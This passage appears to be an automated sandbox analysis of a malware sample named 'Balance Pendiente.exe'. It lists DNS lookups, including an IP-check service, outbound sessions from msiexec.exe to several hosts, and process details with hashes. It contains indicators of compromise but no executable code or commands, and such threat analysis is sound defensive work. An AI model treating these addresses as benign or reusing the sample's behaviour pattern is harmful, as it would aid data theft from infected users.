Feb 25, 2025 08:27:52.556617022 CET | 49899 | 443 | 192.168.2.4 | 104.21.96.1 |
Feb 25, 2025 08:27:52.747050047 CET | 49893 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:52.752444029 CET | 80 | 49893 | 158.101.44.242 | 192.168.2.4 |
Feb 25, 2025 08:27:52.752507925 CET | 49893 | 80 | 192.168.2.4 | 158.101.44.242 |
Feb 25, 2025 08:27:52.756226063 CET | 49905 | 443 | 192.168.2.4 | 149.154.167.220 |
Feb 25, 2025 08:27:52.756268024 CET | 443 | 49905 | 149.154.167.220 | 192.168.2.4 |
Feb 25, 2025 08:27:52.756340027 CET | 49905 | 443 | 192.168.2.4 | 149.154.167.220 |
Feb 25, 2025 08:27:52.756782055 CET | 49905 | 443 | 192.168.2.4 | 149.154.167.220 |
Feb 25, 2025 08:27:52.756794930 CET | 443 | 49905 | 149.154.167.220 | 192.168.2.4 |
Feb 25, 2025 08:27:53.377994061 CET | 443 | 49905 | 149.154.167.220 | 192.168.2.4 |
Feb 25, 2025 08:27:53.378204107 CET | 49905 | 443 | 192.168.2.4 | 149.154.167.220 |
Feb 25, 2025 08:27:53.380194902 CET | 49905 | 443 | 192.168.2.4 | 149.154.167.220 |
Feb 25, 2025 08:27:53.380222082 CET | 443 | 49905 | 149.154.167.220 | 192.168.2.4 |
Feb 25, 2025 08:27:53.380494118 CET | 443 | 49905 | 149.154.167.220 | 192.168.2.4 |
Feb 25, 2025 08:27:53.385106087 CET | 49905 | 443 | 192.168.2.4 | 149.154.167.220 |
Feb 25, 2025 08:27:53.427331924 CET | 443 | 49905 | 149.154.167.220 | 192.168.2.4 |
Feb 25, 2025 08:27:53.628149986 CET | 443 | 49905 | 149.154.167.220 | 192.168.2.4 |
Feb 25, 2025 08:27:53.628222942 CET | 443 | 49905 | 149.154.167.220 | 192.168.2.4 |
Feb 25, 2025 08:27:53.628382921 CET | 49905 | 443 | 192.168.2.4 | 149.154.167.220 |
Feb 25, 2025 08:27:53.631210089 CET | 49905 | 443 | 192.168.2.4 | 149.154.167.220 |
Feb 25, 2025 08:27:59.796832085 CET | 49830 | 80 | 192.168.2.4 | 158.101.44.242 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 25, 2025 08:27:34.686697960 CET | 52480 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:34.693865061 CET | 53 | 52480 | 1.1.1.1 | 192.168.2.4 |
Feb 25, 2025 08:27:35.923798084 CET | 57736 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:35.931056023 CET | 53 | 57736 | 1.1.1.1 | 192.168.2.4 |
Feb 25, 2025 08:27:40.351269007 CET | 63088 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:40.358627081 CET | 53 | 63088 | 1.1.1.1 | 192.168.2.4 |
Feb 25, 2025 08:27:41.670273066 CET | 61048 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:41.689589977 CET | 53 | 61048 | 1.1.1.1 | 192.168.2.4 |
Feb 25, 2025 08:27:52.747853994 CET | 55731 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:52.755647898 CET | 53 | 55731 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Feb 25, 2025 08:27:34.686697960 CET | 192.168.2.4 | 1.1.1.1 | 0xcbb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 25, 2025 08:27:35.923798084 CET | 192.168.2.4 | 1.1.1.1 | 0x3027 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 25, 2025 08:27:40.351269007 CET | 192.168.2.4 | 1.1.1.1 | 0x88d9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 25, 2025 08:27:41.670273066 CET | 192.168.2.4 | 1.1.1.1 | 0x2e5a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Feb 25, 2025 08:27:52.747853994 CET | 192.168.2.4 | 1.1.1.1 | 0x4e23 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Feb 25, 2025 08:27:34.693865061 CET | 1.1.1.1 | 192.168.2.4 | 0xcbb | No error (0) | 172.217.18.14 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:35.931056023 CET | 1.1.1.1 | 192.168.2.4 | 0x3027 | No error (0) | 142.250.185.193 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | checkip.dyndns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | 158.101.44.242 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | 132.226.247.73 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | 132.226.8.169 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | 193.122.130.0 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | 193.122.6.168 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | 104.21.96.1 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | 104.21.112.1 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | 104.21.16.1 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | 104.21.64.1 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | 104.21.32.1 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | 104.21.80.1 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | 104.21.48.1 | A (IP address) | IN (0x0001) | false | ||
Feb 25, 2025 08:27:52.755647898 CET | 1.1.1.1 | 192.168.2.4 | 0x4e23 | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:40.377614021 CET | 151 | OUT | |
Feb 25, 2025 08:27:40.949151993 CET | 321 | IN | |
Feb 25, 2025 08:27:40.973191023 CET | 127 | OUT | |
Feb 25, 2025 08:27:41.130731106 CET | 321 | IN | |
Feb 25, 2025 08:27:42.383109093 CET | 127 | OUT | |
Feb 25, 2025 08:27:42.539824009 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49830 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:43.175154924 CET | 127 | OUT | |
Feb 25, 2025 08:27:43.748409033 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49842 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:44.384087086 CET | 151 | OUT | |
Feb 25, 2025 08:27:44.989926100 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49851 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:45.617341042 CET | 151 | OUT | |
Feb 25, 2025 08:27:46.190720081 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49860 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:46.823997021 CET | 151 | OUT | |
Feb 25, 2025 08:27:47.759228945 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49870 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:48.403321981 CET | 151 | OUT | |
Feb 25, 2025 08:27:48.987392902 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49881 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:49.625124931 CET | 151 | OUT | |
Feb 25, 2025 08:27:50.713785887 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49893 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:51.374267101 CET | 151 | OUT | |
Feb 25, 2025 08:27:51.957364082 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49770 | 172.217.18.14 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:35 UTC | 216 | OUT | |
2025-02-25 07:27:35 UTC | 1610 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49781 | 142.250.185.193 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:36 UTC | 258 | OUT | |
2025-02-25 07:27:39 UTC | 5014 | IN | |
2025-02-25 07:27:39 UTC | 5014 | IN | |
2025-02-25 07:27:39 UTC | 4672 | IN | |
2025-02-25 07:27:39 UTC | 1321 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49818 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:42 UTC | 85 | OUT | |
2025-02-25 07:27:42 UTC | 858 | IN | |
2025-02-25 07:27:42 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49828 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:43 UTC | 61 | OUT | |
2025-02-25 07:27:43 UTC | 850 | IN | |
2025-02-25 07:27:43 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49836 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:44 UTC | 85 | OUT | |
2025-02-25 07:27:44 UTC | 860 | IN | |
2025-02-25 07:27:44 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49848 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:45 UTC | 61 | OUT | |
2025-02-25 07:27:45 UTC | 852 | IN | |
2025-02-25 07:27:45 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49855 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:46 UTC | 61 | OUT | |
2025-02-25 07:27:46 UTC | 856 | IN | |
2025-02-25 07:27:46 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49865 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:48 UTC | 85 | OUT | |
2025-02-25 07:27:48 UTC | 856 | IN | |
2025-02-25 07:27:48 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49875 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:49 UTC | 85 | OUT | |
2025-02-25 07:27:49 UTC | 856 | IN | |
2025-02-25 07:27:49 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49887 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:51 UTC | 85 | OUT | |
2025-02-25 07:27:51 UTC | 856 | IN | |
2025-02-25 07:27:51 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.4 | 49899 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:52 UTC | 85 | OUT | |
2025-02-25 07:27:52 UTC | 854 | IN | |
2025-02-25 07:27:52 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.4 | 49905 | 149.154.167.220 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:53 UTC | 349 | OUT | |
2025-02-25 07:27:53 UTC | 344 | IN | |
2025-02-25 07:27:53 UTC | 55 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 02:26:35 |
Start date: | 25/02/2025 |
Path: | C:\Users\user\Desktop\Balance Pendiente.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 507'280 bytes |
MD5 hash: | E70E71A31781B44F850A39693784CE74 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 02:26:37 |
Start date: | 25/02/2025 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xbd0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 02:26:37 |
Start date: | 25/02/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 02:27:19 |
Start date: | 25/02/2025 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8e0000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |